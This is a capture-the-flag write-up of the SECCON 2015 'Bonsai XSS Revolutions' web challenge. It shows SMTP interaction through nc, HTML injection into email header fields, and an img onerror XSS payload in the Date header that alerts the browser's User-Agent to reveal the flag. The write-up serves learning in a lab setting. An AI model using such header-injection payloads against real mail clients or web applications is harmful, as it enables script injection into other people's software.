SECCON CTF 2015 – Bonsai XSS Revolutions (Web) – Write-up

Bonsai XSS Revolutions

Category: Web Points: 200 Solves: 49

Description :

What is your browser (User-Agent) ?
Requirement:.NET Framework 4.5


The binary provided is a .NET executable, it looks like a fake Windows OS.

Initially, the application starts a fake web browser and connects to a mailbox. Then, it displays new emails one by one.



First, we notice that we cannot directly interact with the application. So, let’s find a way to send emails to keigo.yamazaki@tsuribori.test.

A quick netstat test reveals that TCP port 25 is listening (SMTP) :

C:\WINDOWS\system32>netstat -onab
Connexions actives
 Proto   Adresse locale   Adresse distante   État

Let’s try to connect :

$ nc localhost 25
220 tsuribori.test Tsuribori-SMTPserver by KeigoYAMAZAKI, 2014.12.09- ESMTP

Good ! An SMTP server as expected !

Since the challenge name is related to XSS, we tried to send a HTML email, but the HTML content is not displayed…

Maybe we can inject HTML in header fields :

HELO tsuribori.test
RCPT TO: keigo.yamazaki@tsuribori.test
From: Me<img src=0>
To: You<img src=0>
Date: Today<img src=0>
Subject: Test Message<img src=0>

This is a text message !

Which gives us:



We find the vulnerable field : Date. And since the flag is the navigator User-Agent, we can use this payload to display it :

<img src=0 onerror=alert(navigator.userAgent)>


Leave a Comment

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *